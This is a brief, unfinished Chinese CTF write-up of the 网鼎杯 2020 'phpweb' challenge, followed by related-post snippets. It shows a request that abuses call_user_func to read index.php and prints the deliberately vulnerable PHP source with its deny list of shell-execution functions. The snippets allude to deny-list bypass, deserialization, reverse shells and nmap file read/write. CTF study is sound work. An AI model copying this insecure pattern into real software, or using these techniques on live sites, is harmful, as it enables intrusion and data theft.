[网鼎杯 2020 朱雀组]phpweb 待续
抓包看参数 联想到函数 读index.php代码
func=file_get_contents&p=index.php
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
[网鼎杯 2020 朱雀组]phpweb 待续相关推荐
- [网鼎杯 2020 朱雀组]phpweb
目录 解题过程: 找payload: 1. 对in_array()函数进行绕过 2. php反序列化 参考文章: 考点:关于call_user_func()函数的用法,php反序列化(本题不用也能做) ...
- [网鼎杯 2020 朱雀组]phpweb-反弹shell
[网鼎杯 2020 朱雀组]phpweb 通过反弹shell获取flag 打开链接,显示一个不断刷新的页面,通过burp抓包查看 通过对页面源代码的分析,发现在本页面中,通过post传入index.p ...
- [网鼎杯 2020 朱雀组]Think Java
[网鼎杯 2020 朱雀组]Think Java 文章目录 [网鼎杯 2020 朱雀组]Think Java 获取源文件 Swagger JDBC sql注入 关于#的使用 查看数据库名字 获取表名 ...
- 【网鼎杯 2020 朱雀组】Think Java
[网鼎杯 2020 朱雀组]Think Java 首先下载题目附件,是一些.class文件,反编译查看. 注意到引入的其中一个包: import io.swagger.annotations.ApiO ...
- [网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式
目录 方法一: 方法二: 知识点: 1)黑名单取巧绕过 2)PHP的file_get_contents函数使用 3)PHP序列化与反序列化构造 访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回 ...
- NO.2-24 [网鼎杯 2020 朱雀组]Nmap
站老是崩,有点难受. 过程 1.题目非常熟悉,以前在buu写过.主要考察nmap的一些用法. 2. 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -a ...
- [网鼎杯 2020 朱雀组]Nmap
- nmap -oG -iL 写入文件和读取文件之[网鼎杯 2020 朱雀组]Nmap
知识点: 利用-oG,可以将命令和结果写进文件. 利用-iL 和-oN.其中-iL是从inputfilename文件中读取扫描的目标.在这个文件中要有一个主机或者网络的列表,由空格键.制表键或者回车键 ...
- undefsafe原型链[网鼎杯 2020 青龙组]notes
感觉是考原型链但还是有点不知道如何下手,呜呜呜呜呜呜. 从浅入深 Javascript 原型链与原型链污染 [网鼎杯 2020 青龙组]notes var express = require('exp ...
最新文章
- android 退出程序解决内存释放so的问题
- mysql内连接简写_技术分享 | MySQL 的 join_buffer_size 在内连接上的应用
- 用eval在txt中存储list,dict,tuple
- 原生js打印指定节点元素
- C++primer第九章 顺序容器 9.3 顺序容器操作
- 视觉SLAM笔记(31) 特征提取和匹配
- AWR Report and session_cached_cursor
- 浅谈Chrome OS
- html5控制gif图的播放和暂停,使用JS和canvas实现gif动图的停止和播放代码
- BigGAN论文解读
- 计算机专业导论论文范文,计算机新导论论文范文
- 数据库如何执行sql语句
- java 美发管理系统_美容美发管理系统毕业论文.doc
- haribote bootpack.c 主任务程序代码阅读注释
- 乐观锁、悲观锁、分布式锁的概念及实现
- java实现dwg转pdf
- 怎么远程控制别人电脑
- 计算机网络实验3.1.3·CHAP 鉴别配置
- bash输出颜色字体
- 出价策略正在学习周期是多久,工作日修改和周末修改影响效果么?
热门文章
- ImageIO.framework
- nike空军一号AF1多少钱一双
- LED显示屏二次开发接口的设计方案
- 新手总结必看:想要成为一名合格的软件测试工程师,你得会些啥?
- ubuntu15.10 3D桌面
- ios开发返回按钮消失_iOS10 的适配问题,你遇到了吗?导航栏标题和返回按钮神奇的消失了...
- GD32 F303RCT6串口通信和IAP升级
- 目标检测 YOLOv5网络v6 0版本总结
- postgreSQL pgpool-II
- 解决微信小程序请求后端接口碰到合法域名的问题 http-405j及java接口和数据接口的概念区分